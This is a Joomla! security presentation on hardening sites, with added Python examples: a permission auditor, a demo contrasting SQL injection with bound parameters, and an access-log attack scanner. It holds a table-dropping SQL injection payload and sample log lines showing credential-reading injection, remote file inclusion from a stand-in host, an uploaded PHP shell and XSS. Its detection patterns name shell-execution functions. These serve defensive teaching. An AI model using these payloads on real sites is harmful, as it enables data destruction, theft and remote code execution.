
Hidden Secrets For A Hack-Proof Joomla! Site


This presentation provides information about the most common Joomla! attacks and how to protect from them. The basics of securing Joomla! sites are covered in details.

Published in: Technology

  1. HIDDEN SECRETS FOR A HACK-PROOF JOOMLA! Daniel Kanchev @dvkanchev
  2. BEFORE WE BEGIN … ✓ 7+ Years Of Joomla! Experience ✓ 6 Years With SiteGround ✓ Love Travelling The World ✓ Addicted To Extreme Sports
  3. WHO SHOULD CARE ABOUT SECURITY? ✓ Application/Extension Developers ✓ Hosting Providers/System Administrators ✓ YOU (End Joomla! Users)
  4. WHO SHOULD CARE ABOUT SECURITY? EVERYONE! ✓ Application/Extension Developers ✓ Hosting Providers/System Administrators ✓ YOU (End Joomla! Users)
  5. WHY SHOULD YOU CARE? ✓ Be Trustworthy By Protecting Your Clients’ Data ✓ Have A Healthy Site - Avoid Substantial Data Loss/Downtime
  6. HOW DO HACKERS WORK?
  7. EVERYONE’S RESPONSIBLE!
  8. SECURITY IS A PROCESS! KEEP CALM, IT’S NOT ROCKET SCIENCE
  9. IS YOUR SERVER SET UP RIGHT?
  10. SERVER CONFIG & TIPS ✓ Always Update Your Server Software ✓ Harden The Linux Kernel - grsecurity ✓ Chroot Processes ✓ Provide Only Restricted Shell Access ✓ Disable/Remove Unused Services SOLUTIONS: 1H Hive, Better Linux, CloudLinux
  11. PROTECT YOUR WEB SERVER (ModSecurity Rule Sets) ✓ OWASP Rules - http://goo.gl/rC7Uz ✓ Atomic Rules - http://goo.gl/Fv3Vn ✓ Trustwave Paid Rules - http://goo.gl/9IAaB
  12. PROTECT JOOMLA!
  13. #1: UPDATE EVERYTHING!
  14. SITEGROUND AUTO UPDATES
  15. #2: DO THE BASICS ✓ Change The Default “admin” Username ✓ Change The Default “jos_” DB Prefix ✓ Password Protect Your administrator Folder
  16. #3: RESTRICT THE ADMIN AREA BY IP ✓ Step 1: Check Your IP: whatismyip.com ✓ Step 2: Add This Rule To The .htaccess File Inside Your administrator/ Folder: deny from all allow from YOUR_IP_ADDRESS (Apache 2.2 syntax; on Apache 2.4 the equivalent directive is Require ip YOUR_IP_ADDRESS. This only helps if you connect from a static IP, otherwise you lock yourself out.)
  17. #4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS <Files *.php> deny from all </Files> (Put this .htaccess in folders that should only ever hold data and uploads, such as images/, tmp/, cache/ and logs/, so a PHP shell that gets uploaded there cannot be executed. On Apache 2.4 the line inside the <Files> block is Require all denied.)
  18. #5: USE BULLET-PROOF PASSWORDS ✓ Avoid password generators ✓ Don’t use common words ✓ Avoid personal info, names and significant dates: daniel123
  19. THE PERFECT PASSWORD ✓ Choose A Favourite (Not Famous) Movie Quote/Phrase From A Book: We all go a little mad sometimes ✓ Add Punctuation Symbols (?!.,:) And Capital Letters, Remove Whitespace: We.all?go!AlittleMad2sometimes
  20. #6: CHECK YOUR EXTENSIONS ✓ Joomla! Vulnerable Extensions List (VEL): http://vel.joomla.org/ ✓ National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
  21. #7: STAY ON TOP OF SECURITY UPDATES ✓ http://feeds.joomla.org/JoomlaSecurityNews ✓ http://feeds.joomla.org/JoomlaSecurityVulnerableExtensions
  22. BUILD A JOOMLA! SECURITY RSS FEED HOW TO DO IT: http://is.gd/Vze1Zo
  23. #8: FIX YOUR PERMISSIONS AND OWNERSHIP ✓ Folders: 0755 ✓ Files: 0644 ✓ All files/folders should be owned by your main FTP user ✓ NEVER EVER USE 777 permissions
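A permission and ownership audit for a Joomla! document root, added here as an example (it is not code from the original deck, from SiteGround or from Joomla!). It walks the tree, reports anything that is not 0755/0644 or is world-writable, optionally resets the mode, and reports files not owned by the expected user. The make_fixture() helper builds a constructed throwaway tree containing the classic 777 mistake so the script runs offline; its folder and file names are hypothetical.

```python
import os
import stat
import tempfile

DIR_MODE = 0o755   # folders, per the slide
FILE_MODE = 0o644  # files, per the slide


def audit_permissions(root, owner_uid=None, fix=False):
    """Walk ``root`` and return sorted findings.

    Each finding is (relative_path, actual_mode, world_writable, wrong_owner).
    With fix=True the mode is reset to 0755/0644. Ownership is only reported:
    changing it needs chown rights the FTP or web user normally lacks.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        # os.walk yields every directory once as dirpath, so checking dirpath
        # plus its files covers the whole tree exactly once.
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # never chmod through a symlink
            mode = stat.S_IMODE(st.st_mode)
            want = DIR_MODE if stat.S_ISDIR(st.st_mode) else FILE_MODE
            world_writable = bool(mode & stat.S_IWOTH)
            wrong_owner = owner_uid is not None and st.st_uid != owner_uid
            if mode != want or wrong_owner:
                rel = os.path.relpath(path, root)
                findings.append((rel, mode, world_writable, wrong_owner))
                if fix and mode != want:
                    os.chmod(path, want)
    findings.sort()
    return findings


def make_fixture():
    """Constructed throwaway Joomla!-like tree (hypothetical, for the demo only)."""
    root = tempfile.mkdtemp(prefix="joomla_demo_")
    os.chmod(root, DIR_MODE)            # mkdtemp creates the root as 0700
    for d in ("administrator", "images", "tmp"):
        p = os.path.join(root, d)
        os.mkdir(p)
        os.chmod(p, DIR_MODE)           # explicit chmod: mkdir is subject to umask
    for f in ("configuration.php", "index.php", os.path.join("images", "logo.png")):
        p = os.path.join(root, f)
        with open(p, "w") as fh:
            fh.write("demo\n")
        os.chmod(p, FILE_MODE)
    # The two classic mistakes: a 777 folder and a world-writable
    # configuration.php (the file that holds the database password).
    os.chmod(os.path.join(root, "tmp"), 0o777)
    os.chmod(os.path.join(root, "configuration.php"), 0o666)
    return root


if __name__ == "__main__":
    root = make_fixture()
    for rel, mode, ww, wo in audit_permissions(root, owner_uid=os.getuid()):
        flags = (" WORLD-WRITABLE" if ww else "") + (" WRONG-OWNER" if wo else "")
        print(f"{rel}: {mode:04o}{flags}")
    audit_permissions(root, fix=True)
    print("after fix:", audit_permissions(root))
```

Run it against a real site as `audit_permissions("/path/to/public_html", owner_uid=os.getuid())` first without fix=True and read the list: a writable tmp/ or cache/ is sometimes required by a badly written extension, and it is better to know that before blindly resetting everything. Symlinks are skipped on purpose so a link pointing outside the web root is never chmod'ed.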
  24. #9: ADDITIONAL PROTECTION THROUGH THE .htaccess FILE ✓ Remove PHP Sensitive Information ✓ Avoid Visual Fingerprinting ✓ Block Some Popular Tools Used By Hackers How To Do It: http://is.gd/pGfVXQ
  25. #10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS ✓ jHackGuard ✓ Akeeba Admin Tools ✓ jomDefender ✓ jSecure
  26. SQL INJECTION SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't'; (The attacker submitted a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't as the name. The first quote closes the string literal, the semicolons stack extra statements, and the final 't' = 't' keeps the tail syntactically valid. This works only when user input is concatenated into the query text and the database driver executes stacked queries; a bound parameter makes the whole payload an ordinary string value.)
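The payload from the slide run against a throwaway SQLite database, as an added example that is not part of the original deck. The table names and rows are constructed for the demo; sqlite3's executescript() is used only to emulate a driver that executes stacked queries, which the slide's payload needs. Joomla! itself is PHP, but the contrast between string concatenation and a bound parameter is the same in any language.

```python
import sqlite3

# The attacker-controlled "name" value from the slide.
PAYLOAD = "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't"


def build_db():
    """Constructed sample schema and rows (hypothetical, for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users (name, password) VALUES ('admin', 'x'), ('daniel', 'y');
        CREATE TABLE userinfo (id INTEGER PRIMARY KEY, email TEXT);
        INSERT INTO userinfo (email) VALUES ('admin@example.com');
    """)
    return conn


def build_vulnerable_sql(name):
    # String concatenation: the input becomes part of the SQL text itself.
    return "SELECT * FROM users WHERE name = '" + name + "';"


def lookup_vulnerable(conn, name):
    # executescript() runs every statement in the string, which is what a
    # stacked-query-capable driver (e.g. mysqli_multi_query) would do.
    conn.executescript(build_vulnerable_sql(name))


def lookup_safe(conn, name):
    # Parameterised: the value travels separately from the SQL text, so the
    # quote, the semicolons and DROP are just characters inside a string.
    cur = conn.execute("SELECT * FROM users WHERE name = ?", (name,))
    return cur.fetchall()


def table_exists(conn, table):
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


def demo():
    """Run the payload through both code paths and report what survived."""
    results = {}
    conn = build_db()
    lookup_vulnerable(conn, PAYLOAD)
    results["vulnerable_users_table_survives"] = table_exists(conn, "users")
    conn = build_db()
    rows = lookup_safe(conn, PAYLOAD)
    results["safe_users_table_survives"] = table_exists(conn, "users")
    results["safe_rows_for_payload"] = len(rows)
    results["safe_rows_for_real_user"] = len(lookup_safe(conn, "daniel"))
    return results


if __name__ == "__main__":
    print(build_vulnerable_sql(PAYLOAD))
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The concatenated string is exactly the query shown on the slide; the parameterised version returns no rows for the payload and still finds a genuine user, with the users table intact. Escaping the input is the weaker fix, because it has to be done correctly at every call site; binding parameters removes the problem structurally.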
  27. jHackGuard SETUP (attack classes the filter blocks) ✓ SQL Injections ✓ Remote URL/File Inclusions ✓ Remote Code Execution ✓ XSS Based Attacks
  28. #11: BACKUP! BACKUP! BACKUP!
  29. NOW WHAT?
  30. DON’T PANIC!
  31. DISASTER RECOVERY PLAN 1. Create A Copy Of The Hacked Site + All Logs 2. Restore From A Clean Backup 3. Quarantine Your Site - Maintenance Mode 4. Check The Logs For The Malicious Requests 5. Resolve The Security Issues/Clean Malicious Code 6. Unquarantine Your Site
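Step 4 of the recovery plan in practice: a small scanner that reads the web server access log and flags requests in the four attack classes listed on the jHackGuard slide, plus PHP being requested from an upload folder (the case slide #4 guards against). It is an added example, not code from the deck or from jHackGuard; the log lines are constructed in combined log format with documentation IP ranges, and the signature patterns are a deliberately small starting set.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:01:09 +0000] "GET /index.php?option=com_content&id=12%27%20UNION%20SELECT%20username,password%20FROM%20jos_users-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:01:15 +0000] "GET /index.php?mosConfig_absolute_path=http://evil.example/shell.txt? HTTP/1.1" 200 144 "-" "libwww-perl/5.8"
198.51.100.7 - - [12/Mar/2013:10:01:20 +0000] "POST /images/stories/up.php?cmd=base64_decode HTTP/1.1" 200 9 "-" "libwww-perl/5.8"
203.0.113.9 - - [12/Mar/2013:10:02:00 +0000] "GET /index.php?searchword=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to get the client IP, request path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns are matched against the URL-decoded path so %27 and %3C are seen as ' and <.
SIGNATURES = {
    "sqli": re.compile(r"(union\s+select|'\s*or\s+'?\d|--\s*$|;\s*drop\s+table)", re.I),
    "rfi": re.compile(r"[?&][a-z_]+=(https?|ftp)://", re.I),
    "rce": re.compile(r"(base64_decode|eval\(|passthru|shell_exec|system\()", re.I),
    "xss": re.compile(r"(<script|javascript:|onerror\s*=)", re.I),
    "php_in_upload_dir": re.compile(r"^/(images|tmp|cache|logs)/.*\.php", re.I),
}


def scan_log(text):
    """Return one dict per suspicious request: ip, decoded path, status, matched tags."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        path = unquote(m.group("path"))
        tags = sorted(name for name, rx in SIGNATURES.items() if rx.search(path))
        if tags:
            hits.append({"ip": m.group("ip"), "path": path,
                         "status": int(m.group("status")), "tags": tags})
    return hits


def attackers(text):
    """Count flagged requests per client IP, the list you feed into step 5 and the firewall."""
    counts = {}
    for hit in scan_log(text):
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ",".join(hit["tags"]), hit["path"])
    print(attackers(SAMPLE_LOG))
```

A 200 on the RFI or upload-folder lines is the interesting signal: it means the request was served rather than rejected, so those paths go to the top of the clean-up list. The scanner decodes the URL once; attackers double-encode to slip past exactly this kind of pattern, so treat a hit list like this as a lead, not as proof that nothing else happened.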
  32. A FEW THINGS TO TAKE AWAY ✓ Security Is About Making It Harder To Infiltrate - Not Making It Impossible ✓ Security Is An Ongoing Process ✓ Everyone Is Involved
  33. QUESTIONS?
  34. THANK YOU! Daniel Kanchev @dvkanchev
